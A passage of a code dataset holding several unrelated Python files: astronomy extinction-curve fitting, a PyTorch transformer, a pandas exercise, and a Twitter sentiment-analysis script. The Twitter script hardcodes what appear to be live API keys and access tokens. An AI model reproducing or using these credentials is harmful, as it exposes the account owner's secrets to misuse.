with wavelengths\n\n flux_sub : np.ndarray\n Numpy array with continuum subtracted fluxes\n\n results : list\n List with the fitted models for different profiles\n \"\"\"\n # obtain the spectrum of the reddened star\n stardata = StarData(star + \".dat\", path)\n npts = stardata.data[\"SpeX_LXD\"].npts\n waves = stardata.data[\"SpeX_LXD\"].waves.value\n flux_unc = stardata.data[\"SpeX_LXD\"].uncs\n\n # \"manually\" obtain the continuum from the spectrum (i.e. read the flux at 2.4 and 3.6 micron)\n plot_spectrum(\n star,\n path,\n mlam4=True,\n range=[2, 4.5],\n exclude=[\"IRS\", \"STIS_Opt\"],\n )\n\n # fit the continuum reference points with a straight line\n ref_waves = [2.4, 3.6]\n fluxes = [3.33268e-12, 4.053e-12]\n func = Linear1D()\n fit = LinearLSQFitter()\n fit_result = fit(func, ref_waves, fluxes)\n\n # subtract the continuum from the fluxes\n fluxes = stardata.data[\"SpeX_LXD\"].fluxes.value * waves ** 4 - fit_result(waves)\n\n # define different profiles\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss = Gaussian1D(mean=3, stddev=0.13) + Gaussian1D(\n mean=3.4, stddev=0.06, fixed={\"mean\": True}\n )\n\n # 2 Drudes\n drude = Drude1D(x_0=3, fwhm=0.3) + Drude1D(x_0=3.4, fwhm=0.15, fixed={\"x_0\": True})\n\n # 2 Lorentzians\n lorentz = Lorentz1D(x_0=3, fwhm=0.3) + Lorentz1D(\n x_0=3.4, fwhm=0.15, fixed={\"x_0\": True}\n )\n\n # 2 asymmetric Gaussians\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym = Gaussian_asym(x_o=3, gamma_o=0.3) + Gaussian_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 2 \"asymmetric\" Drudes\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 2 asymmetric Lorentzians\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 1 asymmetric Drude\n drude_asym1 = Drude_asym(x_o=3, gamma_o=0.3)\n\n profiles = [\n gauss,\n drude,\n lorentz,\n gauss_asym,\n drude_asym,\n lorentz_asym,\n drude_asym1,\n ]\n\n # fit the different profiles\n fit2 = LevMarLSQFitter()\n results = []\n mask1 = (waves > 2.4) & (waves < 3.6)\n mask2 = mask1 * (npts > 0)\n\n for profile in profiles:\n fit_result = fit2(\n profile,\n waves[mask2],\n fluxes[mask2],\n weights=1 / flux_unc[mask2],\n maxiter=10000,\n )\n results.append(fit_result)\n print(fit_result)\n print(\n \"Chi2\",\n np.sum(((fluxes[mask2] - fit_result(waves[mask2])) / flux_unc[mask2]) ** 2),\n )\n\n return waves[mask1], fluxes[mask1], npts[mask1], results\n\n\ndef fit_features_ext(starpair, path):\n \"\"\"\n Fit the extinction features separately with different profiles\n\n Parameters\n ----------\n starpair : string\n Name of the star pair for which to fit the extinction features, in the format \"reddenedstarname_comparisonstarname\" (no spaces)\n\n path : string\n Path to the data files\n\n Returns\n -------\n waves : np.ndarray\n Numpy array with wavelengths\n\n exts_sub : np.ndarray\n Numpy array with continuum subtracted extinctions\n\n results : list\n List with the fitted models for different profiles\n \"\"\"\n # first, fit the continuum, excluding the region of the features\n fit_spex_ext(starpair, path, exclude=[(2.8, 3.6)])\n\n # retrieve the SpeX data to be fitted, and sort the curve from short to long wavelengths\n extdata = ExtData(\"%s%s_ext.fits\" % (path, starpair.lower()))\n (waves, exts, exts_unc) = extdata.get_fitdata([\"SpeX_SXD\", 
\"SpeX_LXD\"])\n indx = np.argsort(waves)\n waves = waves[indx].value\n exts = exts[indx]\n exts_unc = exts_unc[indx]\n\n # subtract the fitted (powerlaw) continuum from the data, and select the relevant region\n params = extdata.model[\"params\"]\n exts_sub = exts - (params[0] * params[3] * waves ** (-params[2]) - params[3])\n mask = (waves >= 2.8) & (waves <= 3.6)\n waves = waves[mask]\n exts_sub = exts_sub[mask]\n exts_unc = exts_unc[mask]\n\n # define different profiles\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss = Gaussian1D(mean=3, stddev=0.13) + Gaussian1D(mean=3.4, stddev=0.06)\n\n # 2 Drudes\n drude = Drude1D(x_0=3, fwhm=0.3) + Drude1D(x_0=3.4, fwhm=0.15)\n\n # 2 Lorentzians\n lorentz = Lorentz1D(x_0=3, fwhm=0.3) + Lorentz1D(x_0=3.4, fwhm=0.15)\n\n # 2 asymmetric Gaussians\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym = Gaussian_asym(x_o=3, gamma_o=0.3) + Gaussian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n # 2 \"asymmetric\" Drudes\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(x_o=3.4, gamma_o=0.15)\n\n # 2 asymmetric Lorentzians\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n profiles = [gauss, drude, lorentz, gauss_asym, drude_asym, lorentz_asym]\n\n # fit the different profiles\n fit = LevMarLSQFitter()\n results = []\n for profile in profiles:\n fit_result = fit(profile, waves, exts_sub, weights=1 / exts_unc, maxiter=10000)\n results.append(fit_result)\n print(fit_result)\n print(\"Chi2\", np.sum(((exts_sub - fit_result(waves)) / exts_unc) ** 2))\n\n return waves, exts_sub, results\n\n\ndef fit_spex_ext(\n starpair,\n path,\n functype=\"pow\",\n dense=False,\n profile=\"drude_asym\",\n exclude=None,\n bootstrap=False,\n fixed=False,\n):\n \"\"\"\n Fit the observed SpeX NIR extinction curve\n\n Parameters\n ----------\n starpair : string\n Name of the star pair for which to fit the extinction curve, in the format \"reddenedstarname_comparisonstarname\" (no spaces), or \"average\" to fit the average extinction curve\n\n path : string\n Path to the data files\n\n functype : string [default=\"pow\"]\n Fitting function type (\"pow\" for powerlaw or \"pol\" for polynomial)\n\n dense : boolean [default=False]\n Whether or not to fit the features around 3 and 3.4 micron\n\n profile : string [default=\"drude_asym\"]\n Profile to use for the features if dense = True (options are \"gauss\", \"drude\", \"lorentz\", \"gauss_asym\", \"drude_asym\", \"lorentz_asym\")\n\n exclude : list of tuples [default=None]\n list of tuples (min,max) with wavelength regions (in micron) that need to be excluded from the fitting, e.g. [(0.8,1.2),(2.2,5)]\n\n bootstrap : boolean [default=False]\n Whether or not to do a quick bootstrap fitting to get more realistic uncertainties on the fitting results\n\n fixed : boolean [default=False]\n Whether or not to add a fixed feature around 3 micron (for diffuse sightlines)\n\n Returns\n -------\n Updates extdata.model[\"type\", \"waves\", \"exts\", \"residuals\", \"chi2\", \"params\"] and extdata.columns[\"AV\"] with the fitting results:\n - type: string with the type of model (e.g. \"pow_elx_Drude\")\n - waves: np.ndarray with the SpeX wavelengths\n - exts: np.ndarray with the fitted model to the extinction curve at \"waves\" wavelengths\n - residuals: np.ndarray with the residuals, i.e. 
data-fit, at \"waves\" wavelengths\n - chi2 : float with the chi square of the fitting\n - params: list with output Parameter objects\n \"\"\"\n # retrieve the SpeX data to be fitted, and sort the curve from short to long wavelengths\n filename = \"%s%s_ext.fits\" % (path, starpair.lower())\n if fixed:\n filename = filename.replace(\".\", \"_ice.\")\n extdata = ExtData(filename)\n (waves, exts, exts_unc) = extdata.get_fitdata([\"SpeX_SXD\", \"SpeX_LXD\"])\n indx = np.argsort(waves)\n waves = waves[indx].value\n exts = exts[indx]\n exts_unc = exts_unc[indx]\n\n # exclude wavelength regions if requested\n if exclude:\n mask = np.full_like(waves, False, dtype=bool)\n for region in exclude:\n mask += (waves > region[0]) & (waves < region[1])\n waves = waves[~mask]\n exts = exts[~mask]\n exts_unc = exts_unc[~mask]\n\n # get a quick estimate of A(V)\n if extdata.type == \"elx\":\n extdata.calc_AV()\n AV_guess = extdata.columns[\"AV\"]\n else:\n AV_guess = None\n\n # convert to A(lambda)/A(1 micron)\n # ind1 = np.abs(waves - 1).argmin()\n # exts = exts / exts[ind1]\n # exts_unc = exts_unc / exts[ind1]\n\n # obtain the function to fit\n if \"SpeX_LXD\" not in extdata.waves.keys():\n dense = False\n fixed = False\n func = fit_function(\n dattype=extdata.type,\n functype=functype,\n dense=dense,\n profile=profile,\n AV_guess=AV_guess,\n fixed=fixed,\n )\n\n # for dense sightlines, add more weight to the feature region\n weights = 1 / exts_unc\n if dense:\n mask_ice = (waves > 2.88) & (waves < 3.19)\n mask_tail = (waves > 3.4) & (waves < 4)\n weights[mask_ice + mask_tail] *= 2\n\n # use the Levenberg-Marquardt algorithm to fit the data with the model\n fit = LevMarLSQFitter()\n fit_result_lev = fit(func, waves, exts, weights=weights, maxiter=10000)\n\n # set up the backend to save the samples for the emcee runs\n emcee_samples_file = path + \"Fitting_results/\" + starpair + \"_emcee_samples.h5\"\n\n # do the fitting again, with MCMC, using the results from the first fitting as input\n fit2 = EmceeFitter(nsteps=10000, burnfrac=0.1, save_samples=emcee_samples_file)\n\n # add parameter bounds\n for param in fit_result_lev.param_names:\n if \"amplitude\" in param:\n getattr(fit_result_lev, param).bounds = (0, 2)\n elif \"alpha\" in param:\n getattr(fit_result_lev, param).bounds = (0, 4)\n elif \"Av\" in param:\n getattr(fit_result_lev, param).bounds = (0, 10)\n\n fit_result_mcmc = fit2(fit_result_lev, waves, exts, weights=weights)\n\n # create standard MCMC plots\n fit2.plot_emcee_results(\n fit_result_mcmc, filebase=path + \"Fitting_results/\" + starpair\n )\n\n # choose the fit result to save\n fit_result = fit_result_mcmc\n # fit_result = fit_result_lev\n print(fit_result)\n\n # determine the wavelengths at which to evaluate and save the fitted model curve: all SpeX wavelengths, sorted from short to long (to avoid problems with overlap between SXD and LXD), and shortest and longest wavelength should have data\n if \"SpeX_LXD\" not in extdata.waves.keys():\n full_waves = extdata.waves[\"SpeX_SXD\"].value\n full_npts = extdata.npts[\"SpeX_SXD\"]\n else:\n full_waves = np.concatenate(\n (extdata.waves[\"SpeX_SXD\"].value, extdata.waves[\"SpeX_LXD\"].value)\n )\n full_npts = np.concatenate((extdata.npts[\"SpeX_SXD\"], extdata.npts[\"SpeX_LXD\"]))\n # sort the wavelengths\n indxs_sort = np.argsort(full_waves)\n full_waves = full_waves[indxs_sort]\n full_npts = full_npts[indxs_sort]\n # cut the wavelength region\n indxs = np.logical_and(full_waves >= np.min(waves), full_waves <= np.max(waves))\n full_waves 
= full_waves[indxs]\n full_npts = full_npts[indxs]\n\n # calculate the residuals and put them in an array of the same length as \"full_waves\" for plotting\n residuals = exts - fit_result(waves)\n full_res = np.full_like(full_npts, np.nan)\n if exclude:\n mask = np.full_like(full_waves, False, dtype=bool)\n for region in exclude:\n mask += (full_waves > region[0]) & (full_waves < region[1])\n full_res[(full_npts > 0) * ~mask] = residuals\n\n else:\n full_res[(full_npts > 0)] = residuals\n\n # bootstrap to get more realistic uncertainties on the parameter results\n if bootstrap:\n red_star = StarData(extdata.red_file, path=path, use_corfac=True)\n comp_star = StarData(extdata.comp_file, path=path, use_corfac=True)\n red_V_unc = red_star.data[\"BAND\"].get_band_mag(\"V\")[1]\n comp_V_unc = comp_star.data[\"BAND\"].get_band_mag(\"V\")[1]\n unc_V = np.sqrt(red_V_unc ** 2 + comp_V_unc ** 2)\n fit_result_mcmc_low = fit2(fit_result_lev, waves, exts - unc_V, weights=weights)\n fit_result_mcmc_high = fit2(\n fit_result_lev, waves, exts + unc_V, weights=weights\n )\n\n # save the fitting results to the fits file\n if dense:\n functype += \"_\" + profile\n extdata.model[\"type\"] = functype + \"_\" + extdata.type\n extdata.model[\"waves\"] = full_waves\n extdata.model[\"exts\"] = fit_result(full_waves)\n extdata.model[\"residuals\"] = full_res\n extdata.model[\"chi2\"] = np.sum((residuals / exts_unc) ** 2)\n print(\"Chi2\", extdata.model[\"chi2\"])\n extdata.model[\"params\"] = []\n for param in fit_result.param_names:\n # update the uncertainties when bootstrapping\n if bootstrap:\n min_val = min(\n getattr(fit_result_mcmc, param).value,\n getattr(fit_result_mcmc_low, param).value,\n getattr(fit_result_mcmc_high, param).value,\n )\n max_val = max(\n getattr(fit_result_mcmc, param).value,\n getattr(fit_result_mcmc_low, param).value,\n getattr(fit_result_mcmc_high, param).value,\n )\n sys_unc = (max_val - min_val) / 2\n getattr(fit_result, param).unc_minus = np.sqrt(\n getattr(fit_result, param).unc_minus ** 2 + sys_unc ** 2\n )\n getattr(fit_result, param).unc_plus = np.sqrt(\n getattr(fit_result, param).unc_plus ** 2 + sys_unc ** 2\n )\n\n extdata.model[\"params\"].append(getattr(fit_result, param))\n\n # save the column information (A(V), E(B-V) and R(V))\n if \"Av\" in param:\n extdata.columns[\"AV\"] = (\n getattr(fit_result, param).value,\n getattr(fit_result, param).unc_minus,\n getattr(fit_result, param).unc_plus,\n )\n # calculate the distrubtion of R(V) and 1/R(V) from the distributions of A(V) and E(B-V)\n nsamples = getattr(fit_result, param).posterior.n_samples\n av_dist = unc.normal(\n extdata.columns[\"AV\"][0],\n std=(extdata.columns[\"AV\"][1] + extdata.columns[\"AV\"][2]) / 2,\n n_samples=nsamples,\n )\n b_indx = np.abs(extdata.waves[\"BAND\"] - 0.438 * u.micron).argmin()\n ebv_dist = unc.normal(\n extdata.exts[\"BAND\"][b_indx],\n std=extdata.uncs[\"BAND\"][b_indx],\n n_samples=nsamples,\n )\n ebv_per = ebv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"EBV\"] = (\n ebv_per[1],\n ebv_per[1] - ebv_per[0],\n ebv_per[2] - ebv_per[1],\n )\n rv_dist = av_dist / ebv_dist\n rv_per = rv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"RV\"] = (\n rv_per[1],\n rv_per[1] - rv_per[0],\n rv_per[2] - rv_per[1],\n )\n inv_rv_dist = ebv_dist / av_dist\n inv_rv_per = inv_rv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"IRV\"] = (\n inv_rv_per[1],\n inv_rv_per[1] - inv_rv_per[0],\n inv_rv_per[2] - inv_rv_per[1],\n )\n print(extdata.columns)\n\n # save the 
fits file\n extdata.save(filename)\n\n # print information about the ice feature\n if fixed:\n print(\n \"Ice feature strength: \",\n extdata.model[\"params\"][3].value,\n extdata.model[\"params\"][3].unc_minus,\n extdata.model[\"params\"][3].unc_plus,\n )\n\n\nif __name__ == \"__main__\":\n path = \"/Users/mdecleir/Documents/NIR_ext/Data/\"\n fit_spex_ext(\"HD283809_HD003360\", path)\n","repo_name":"mdecleir/spex_nir_extinction","sub_path":"fit_spex_ext.py","file_name":"fit_spex_ext.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"73054192581","text":"import math, copy\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom scripts.TransLinsUtils import *\n\n\nclass TransformerMultiHeadAttention(nn.Module):\n def __init__(self, num_heads, emb_dim, dim_k = None, dropout = 0.1):\n super().__init__()\n \n self.emb_dim = emb_dim\n self.dim_k = dim_k if dim_k else emb_dim // num_heads\n self.num_heads = num_heads\n self.q_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n self.k_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n self.v_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n\n self.dropout = nn.Dropout(dropout)\n self.out = nn.Linear(self.dim_k*num_heads,emb_dim)\n \n def attention(self, q, k, v, dim_k, mask=None, dropout=None, explain=False):\n k = k.transpose(-2, -1)\n if explain: print('q, k', q.shape, k.shape)\n # matrix multiplication is done using the last two dimensions\n # (batch_size,num_heads,q_seq_len,dim_k)X(batch_size,num_heads,dim_k,k_seq_len)\n #(batch_size,num_heads,q_seq_len,k_seq_len)\n scores = torch.matmul(q, k) / math.sqrt(dim_k) \n if explain: print('scores.shape', scores.shape)\n if mask is not None:\n mask = mask.unsqueeze(1)\n if explain: print('mask.shape', mask.shape)\n scores = scores.masked_fill(mask == 0, -1e9) \n softscores = F.softmax(scores, dim=-1)\n if dropout is not None: softscores = dropout(softscores)\n \n #(batch_size,num_heads,seq_len,seq_len)X(batch_size,num_heads,seq_len,dim_k)\n output = torch.matmul(softscores, v)\n return output, scores #=(batch_size,num_heads,seq_len,dim_k)\n \n def forward(self, q, k, v, mask=None, explain=False):\n '''\n inputs:\n q has shape (batch size, q_sequence length, embedding dimensions)\n k,v are shape (batch size, kv_sequence length, embedding dimensions)\n source_mask of shape (batch size, 1, kv_sequence length)\n outputs: sequence of vectors, re-represented using attention\n shape (batch size, q_sequence length, embedding dimensions)\n use:\n The encoder layer places the same source vector sequence into q,k,v \n and source_mask into mask.\n The decoder layer uses this twice, once with decoder inputs as q,k,v \n and target mask as mask. 
then with decoder inputs as q, encoder outputs\n as k, v and source mask as mask\n '''\n # k,q,v are each shape (batch size, sequence length, dim_k * num_heads)\n batch_size = q.size(0)\n q = self.q_linear(q)\n k = self.k_linear(k)\n v = self.v_linear(v)\n if explain: print(\"(batch size, sequence length, dim_k * num_heads)\", k.shape)\n # k,q,v are each shape (batch size, sequence length, num_heads, dim_k)\n k = k.view(batch_size,-1,self.num_heads,self.dim_k)\n q = q.view(batch_size,-1,self.num_heads,self.dim_k)\n v = v.view(batch_size,-1,self.num_heads,self.dim_k)\n # transpose to shape (batch_size, num_heads, sequence length, dim_k)\n k = k.transpose(1,2)\n q = q.transpose(1,2)\n v = v.transpose(1,2)\n if explain: print(\"(batch_size,num_heads,seq_length,dim_k)\",k.shape)\n # calculate attention using function we will define next\n attn, scores = self.attention(q, k, v, self.dim_k, mask, self.dropout, explain)\n if explain: print(\"attn(batch_size,num_heads,seq_length,dim_k)\", attn.shape)\n # concatenate heads and \n concat=attn.transpose(1,2).contiguous().view(batch_size,-1,self.dim_k*self.num_heads)\n if explain: print(\"concat.shape\", concat.shape)\n # put through final linear layer\n output = self.out(concat)\n if explain: print(\"TransformerMultiHeadAttention output.shape\", output.shape)\n return output, scores\n\nclass TransformerEncoderLayer(nn.Module):\n def __init__(self, emb_dim, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = Norm(emb_dim)\n self.dropout_1 = nn.Dropout(dropout)\n self.attn = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.norm_2 = Norm(emb_dim)\n self.ff = FeedForward(emb_dim, dropout=dropout)\n self.dropout_2 = nn.Dropout(dropout)\n \n def forward(self, vector_sequence, mask):\n '''\n input:\n vector_sequence of shape (batch size, sequence length, embedding dimensions)\n source_mask (mask over input sequence) of shape (batch size, 1, sequence length)\n output: sequence of vectors after embedding, postional encoding, attention and normalization\n shape (batch size, sequence length, embedding dimensions)\n '''\n x2 = self.norm_1(vector_sequence)\n x2_attn, x2_scores = self.attn(x2,x2,x2,mask)\n vector_sequence = vector_sequence + self.dropout_1(x2_attn)\n x2 = self.norm_2(vector_sequence)\n vector_sequence = vector_sequence + self.dropout_2(self.ff(x2))\n return vector_sequence\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.n_layers = n_layers\n self.embed = Embedder(vocab_size, emb_dim)\n self.pe = PositionalEncoder(emb_dim, dropout=dropout)\n self.layers = get_clones(TransformerEncoderLayer(emb_dim, heads, dropout), n_layers)\n self.norm = Norm(emb_dim)\n def forward(self, source_sequence, source_mask):\n '''\n input:\n source_sequence (sequence of source tokens) of shape (batch size, sequence length)\n source_mask (mask over input sequence) of shape (batch size, 1, sequence length)\n output: sequence of vectors after embedding, postional encoding, attention and normalization\n shape (batch size, sequence length, embedding dimensions)\n '''\n vector_sequence = self.embed(source_sequence)\n vector_sequence = self.pe(vector_sequence)\n for i in range(self.n_layers):\n vector_sequence = self.layers[i](vector_sequence, source_mask)\n vector_sequence = self.norm(vector_sequence)\n return vector_sequence\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, emb_dim, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = 
Norm(emb_dim)\n self.norm_2 = Norm(emb_dim)\n self.norm_3 = Norm(emb_dim)\n \n self.dropout_1 = nn.Dropout(dropout)\n self.dropout_2 = nn.Dropout(dropout)\n self.dropout_3 = nn.Dropout(dropout)\n \n self.attn_1 = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.attn_2 = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.ff = FeedForward(emb_dim, dropout=dropout)\n\n def forward(self, de_out, de_mask, en_out, en_mask):\n '''\n inputs:\n de_out - decoder ouputs so far (batch size, output sequence length, embedding dimensions)\n de_mask (batch size, output sequence length, output sequence length)\n en_out - encoder output (batch size, input sequence length, embedding dimensions)\n en_mask (batch size, 1, input sequence length)\n ouputs:\n de_out (next decoder output) (batch size, output sequence length, embedding dimensions)\n '''\n de_nrm = self.norm_1(de_out)\n #Self Attention \n self_attn, self_scores = self.attn_1(de_nrm, de_nrm, de_nrm, de_mask)\n de_out = de_out + self.dropout_1(self_attn)\n de_nrm = self.norm_2(de_out)\n #DecoderEncoder Attention\n en_attn, en_scores = self.attn_2(de_nrm, en_out, en_out, en_mask) \n de_out = de_out + self.dropout_2(en_attn)\n de_nrm = self.norm_3(de_out)\n de_out = de_out + self.dropout_3(self.ff(de_nrm))\n return de_out\n\nclass TransformerDecoder(nn.Module):\n '''\n If your target sequence is `see` `ya` and you want to train on the entire \n sequence against the target, you would use `` `see` `ya`\n as the de_out (decoder ouputs so far) and compare the \n output de_out (next decoder output) `see` `ya` `` \n as the target in the loss function. The inclusion of the ``\n for the (decoder ouputs so far) and `` for the \n '''\n def __init__(self, vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.n_layers = n_layers\n self.embed = Embedder(vocab_size, emb_dim)\n self.pe = PositionalEncoder(emb_dim, dropout=dropout)\n self.layers = get_clones(TransformerDecoderLayer(emb_dim, heads, dropout), n_layers)\n self.norm = Norm(emb_dim)\n def forward(self, de_toks, de_mask, en_vecs, en_mask):\n '''\n inputs:\n de_toks - decoder ouputs so far (batch size, output sequence length)\n de_mask (batch size, output sequence length, output sequence length)\n en_vecs - encoder output (batch size, input sequence length, embedding dimensions)\n en_mask (batch size, 1, input sequence length)\n outputs:\n de_vecs - next decoder output (batch size, output sequence length, embedding dimensions)\n\n '''\n x = self.embed(de_toks)\n x = self.pe(x)\n for i in range(self.n_layers):\n x = self.layers[i](x, de_mask, en_vecs, en_mask)\n return self.norm(x)\n\nclass Transformer(nn.Module):\n def __init__(self, in_vocab_size, out_vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.encoder = TransformerEncoder(in_vocab_size, emb_dim, n_layers, heads, dropout)\n self.decoder = TransformerDecoder(out_vocab_size, emb_dim, n_layers, heads, dropout)\n self.out = nn.Linear(emb_dim, out_vocab_size)\n def forward(self, src_seq, src_mask, trg_seq, trg_mask):\n e_output = self.encoder(src_seq, src_mask)\n d_output = self.decoder(trg_seq, trg_mask, e_output, src_mask)\n output = self.out(d_output)\n return output\n\n","repo_name":"Alaqian/Linformer-Based-Conversational-Chatbot","sub_path":"scripts/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} 
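A minimal usage sketch for the Transformer module in the preceding record (scripts/Transformer.py). This is an editorial illustration, not part of the dataset: the vocabulary sizes, tensor shapes, pad index, and the make_masks helper are assumptions, chosen only to match the mask shapes documented in the module's own docstrings ((batch, 1, src_len) for the encoder source mask, (batch, trg_len, trg_len) causal mask for the decoder).

# Hypothetical driver for the Transformer class above (not from the repo).
import torch

def make_masks(src, trg, pad_idx=0):
    # Source mask hides padding tokens: shape (batch, 1, src_len).
    src_mask = (src != pad_idx).unsqueeze(1)
    # Target mask combines a padding mask with a causal (lower-triangular)
    # mask so position i cannot attend to positions > i: (batch, trg_len, trg_len).
    trg_pad = (trg != pad_idx).unsqueeze(1)
    trg_len = trg.size(1)
    causal = torch.tril(torch.ones(trg_len, trg_len)).bool()
    return src_mask, trg_pad & causal

# Assuming scripts/Transformer.py is importable, usage could look like:
# model = Transformer(in_vocab_size=1000, out_vocab_size=1000,
#                     emb_dim=512, n_layers=6, heads=8, dropout=0.1)
# src = torch.randint(1, 1000, (2, 10))   # batch of 2 source sequences
# trg = torch.randint(1, 1000, (2, 9))    # decoder inputs so far
# src_mask, trg_mask = make_masks(src, trg)
# logits = model(src, src_mask, trg, trg_mask)  # (2, 9, out_vocab_size)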
+{"seq_id":"73678574661","text":"import pandas as pd\r\nimport os\r\n\r\nos.chdir(\"C:\\\\Users\\\\arman\\\\OneDrive\\\\Desktop\\\\2020\\DataCamp\\\\15 Merging_Data_Frames_Pandas\\\\01_Preparing_Data\\\\Summer Olympic medals\")\r\nos.getcwd()\r\nos.listdir(\"C:\\\\Users\\\\arman\\\\OneDrive\\\\Desktop\\\\2020\\DataCamp\\\\15 Merging_Data_Frames_Pandas\\\\01_Preparing_Data\\\\Summer Olympic medals\")\r\n\r\n# Create the list of file names: filenames\r\nfilenames = ['Gold.csv', 'Silver.csv', 'Bronze.csv']\r\n\r\n# Create the list of three DataFrames: dataframes\r\ndataframes = []\r\nfor filename in filenames:\r\n dataframes.append(pd.read_csv(filename))\r\n\r\n# Print top 5 rows of 1st DataFrame in dataframes\r\nprint(dataframes[0].head())\r\nprint(dataframes[1].head())\r\nprint(dataframes[2].head())\r\n","repo_name":"ArmandoReyesRepo/PythonCode","sub_path":"15 Merging_Data_Frames_Pandas/01_Preparing_Data/02_Reading_Loop.py","file_name":"02_Reading_Loop.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"70084662661","text":"from textblob import TextBlob\r\nimport sys, tweepy\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef percentage(part,whole):\r\n return 100*float(part)/float(whole)\r\n\r\nconsumerKey=\"Kx05pI2ZHtRkQs6LHsLYOkeRK\"\r\nconsumerSecret=\"grY1yujbtYBRwfspIS8swiFoXUlTrBgr5I4IwcQhBbWmyFgYPM\"\r\naccessToken=\"2530152451-OO6vRCLjNXQIaHyelo1TdFhSlI8YpBzpUX91RAa\"\r\naccessTokenSecret=\"jscWVipPNASXspdVbwNxiRY1ZpiAw3syUi6agB4kcmr1m\"\r\n\r\n\r\nauth=tweepy.OAuthHandler(consumer_key=consumerKey,consumer_secret=consumerSecret)\r\nauth.set_access_token(accessToken,accessTokenSecret)\r\napi=tweepy.API(auth)\r\n\r\nsearchTerm=input(\"Enter hashtag to search:\")\r\nnumberofSeachTerms=int(input(\"How many tweets to analyze?\"))\r\n\r\ntweets=tweepy.Cursor(api.search, q=searchTerm, lang=\"English\").items(numberofSeachTerms)\r\n\r\n\r\npositive=0.00\r\nnegative=0.00\r\nmixed=0.00\r\npolarity=0.00\r\n\r\nfor tweet in tweets:\r\n print(tweet.text)\r\n analysis=TextBlob(tweet.text)\r\n polarity+=analysis.sentiment.polarity\r\n if(analysis.sentiment.polarity==0.00):\r\n mixed+=1\r\n elif(analysis.sentiment.polarity<0.00):\r\n negative+=1\r\n elif(analysis.sentiment.polarity>0.00):\r\n positive+=1\r\n\r\npositive=percentage(positive,numberofSeachTerms)\r\nnegative=percentage(negative,numberofSeachTerms)\r\nmixed=percentage(mixed,numberofSeachTerms)\r\npolarity=percentage(polarity,numberofSeachTerms)\r\n\r\npositive=format(positive,'.2f')\r\nnegative=format(negative,'.2f')\r\nmixed=format(mixed,'.2f')\r\n\r\nprint('How people are reacting on'+searchTerm)\r\n\r\nif(polarity==0):\r\n print(\"Mixed Views\")\r\nelif(polarity<0.00):\r\n print(\"Negatively\")\r\nelif(polarity>0.00):\r\n print(\"Positively\")\r\n\r\nlabels=[\"Positive[\"+str(positive)+\"%]\",\"Mixed Views[\"+str(mixed)+\"%]\",\"Negative[\"+str(negative)+\"%]\"]\r\nsizes=[positive,mixed,negative]\r\ncolors=[\"pink\",\"lightgreen\",\"lightblue\"]\r\npatches,texts=plt.pie(sizes,colors=colors,startangle=90)\r\nplt.legend(patches,labels,loc=\"best\")\r\nplt.title(\"People are reacting on\"+searchTerm)\r\nplt.axis(\"equal\")\r\nplt.tight_layout()\r\nplt.show()\r\n","repo_name":"thatgem/SentimentAnalyzer2018","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"39428034144","text":"#Polymorphism\n 
